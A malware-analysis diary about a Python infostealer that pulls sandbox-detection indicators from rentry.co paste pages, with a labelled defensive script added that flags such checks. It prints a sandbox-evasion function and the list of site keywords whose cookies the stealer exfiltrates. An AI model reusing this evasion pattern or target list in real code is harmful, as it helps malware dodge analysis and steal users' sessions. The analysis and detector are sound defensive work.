Python InfoStealer With Dynamic Sandbox Detection

    Published: 2024-02-20
    Last Updated: 2024-02-20 07:07:02 UTC
    by Xavier Mertens (Version: 1)
    0 comment(s)

    Infostealers written in Python are not new. They also embed many sandbox detection mechanisms to avoid being executed (and probably detected) by automated analysis platforms. Last week, I found one that uses the same approach but in a different way. Usually, such scripts carry a hard-coded list of "bad stuff" to check for, like MAC addresses, usernames, processes, etc. These are common ways to detect simple sandboxes that are not well hardened. This time, the "IOD" (Indicators Of Detection) list is stored online on a Pastebin-like site, allowing the indicators to be updated for all scripts already deployed. It also discloses less interesting information in the script itself.

    The file, called main.py, has a VT score of 22/61 (SHA256: e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06)[1].

    The script will fetch indicators from many files hosted on rentry.co[2]:

    remnux@remnux:/MalwareZoo/20240217$ grep hxxps://rentry[.]co main.py 
         processl = requests.get("hxxps://rentry[.]co/x6g3is75/raw").text
         mac_list = requests.get("hxxps://rentry[.]co/ty8exwnb/raw").text
         vm_name = requests.get("hxxps://rentry[.]co/3wr3rpme/raw").text
         vmusername = requests.get("hxxps://rentry[.]co/bnbaac2d/raw").text
         hwid_vm = requests.get("hxxps://rentry[.]co/fnimmyya/raw").text
         gpulist = requests.get("hxxps://rentry[.]co/povewdm6/raw").text
         ip_list = requests.get("hxxps://rentry[.]co/hikbicky/raw").text
         guid_pc = requests.get("hxxps://rentry[.]co/882rg6dc/raw").text
         bios_guid = requests.get("hxxps://rentry[.]co/hxtfvkvq/raw").text
         baseboard_guid = requests.get("hxxps://rentry[.]co/rkf2g4oo/raw").text
         serial_disk = requests.get("hxxps://rentry[.]co/rct2f8fc/raw").text
    

    All files were published on January 27 2024 around 23:19 UTC. The website also shows the number of views. Currently, there are only two (certainly my visits), so the script hasn't been released in the wild yet. I'll keep an eye on these counters in the coming days.

    Here is an example of usage:

    def checkgpu(self):
        c = wmi.WMI()
        for gpu in c.Win32_DisplayConfiguration():
            GPUm = gpu.Description.strip()
        gpulist = requests.get("https://rentry.co/povewdm6/raw").text
        if GPUm in gpulist:
            sys.exit()
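    From a defender's side, the interesting pattern is a function that pulls a list from a paste site's "raw" endpoint and then calls sys.exit(). The following triage script is an added example (not code from the sample or the diary): it walks a Python file's AST and reports every function combining a requests.get() of a paste-site raw URL with an exit call. The paste-host regex and the embedded SAMPLE (modelled on the checkgpu() excerpt, with a placeholder paste ID) are constructed for this example.

```python
import ast
import re

# Paste-site "raw" endpoints such as the rentry.co ones the sample uses.
# Constructed for this example; extend it with other paste hosts you care about.
PASTE_RAW_RE = re.compile(r"https?://(?:rentry\.co|pastebin\.com)/\S+/raw", re.I)

# Calls that end the process: the "bail out if we look like a sandbox" step.
EXIT_CALLS = {"sys.exit", "exit", "quit", "os._exit"}


def find_remote_indicator_checks(source: str) -> list[dict]:
    """Return functions that both fetch a paste-site raw URL via requests.get()
    and call an exit function, i.e. the remote-IOD check described above."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.FunctionDef):
            continue
        urls, exits = [], False
        for sub in ast.walk(node):
            if not isinstance(sub, ast.Call):
                continue
            callee = ast.unparse(sub.func)
            if callee == "requests.get":
                for arg in sub.args:
                    if isinstance(arg, ast.Constant) and isinstance(arg.value, str):
                        if PASTE_RAW_RE.search(arg.value):
                            urls.append(arg.value)
            elif callee in EXIT_CALLS:
                exits = True
        if urls and exits:
            hits.append({"function": node.name, "line": node.lineno, "urls": urls})
    return hits


# Constructed sample modelled on the checkgpu() excerpt; the paste ID is a placeholder.
SAMPLE = '''
import sys, wmi, requests

class Stealer:
    def checkgpu(self):
        c = wmi.WMI()
        for gpu in c.Win32_DisplayConfiguration():
            GPUm = gpu.Description.strip()
        gpulist = requests.get("https://rentry.co/EXAMPLEID/raw").text
        if GPUm in gpulist:
            sys.exit()

    def fetch_config(self):
        return requests.get("https://example.invalid/config.json").text  # no exit: not flagged
'''

if __name__ == "__main__":
    for hit in find_remote_indicator_checks(SAMPLE):
        print(f"line {hit['line']}: {hit['function']}() fetches {hit['urls']} then exits")
```

    Run it over a suspicious .py file's contents (for example with `open(path).read()`) to get a quick list of candidate sandbox-check functions to review first.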

    The remaining part of the stealer is very classic. I just extracted the list of targeted websites (cookies are collected and exfiltrated):

    keyword = [
        'mail',
        'coinbase',
        'sellix',
        'gmail',
        'steam',
        'discord',
        'riotgames',
        'youtube',
        'instagram',
        'tiktok',
        'twitter',
        'facebook',
        'card',
        'epicgames',
        'spotify',
        'yahoo',
        'roblox',
        'twitch',
        'minecraft',
        'bank',
        'paypal',
        'origin',
        'amazon',
        'ebay',
        'aliexpress',
        'playstation',
        'hbo',
        'xbox',
        'buy',
        'sell',
        'binance',
        'hotmail',
        'outlook',
        'crunchyroll',
        'telegram',
        'pornhub',
        'disney',
        'expressvpn',
        'crypto',
        'uber',
        'netflix'
    ]

    You can see that classic sites are targeted, but generic keywords like "crypto", "bank" or "card" are also present. Cookies belonging to any URL containing one of these keywords will also be exfiltrated.

    [1] https://www.virustotal.com/gui/file/e0f6dcf43e19d3ff5d2c19abced7ddc2e703e4083fbdebce5a7d44a4395d7d06/details
    [2] https://rentry.co

    Xavier Mertens (@xme)
    Xameco
    Senior ISC Handler - Freelance Cyber Security Consultant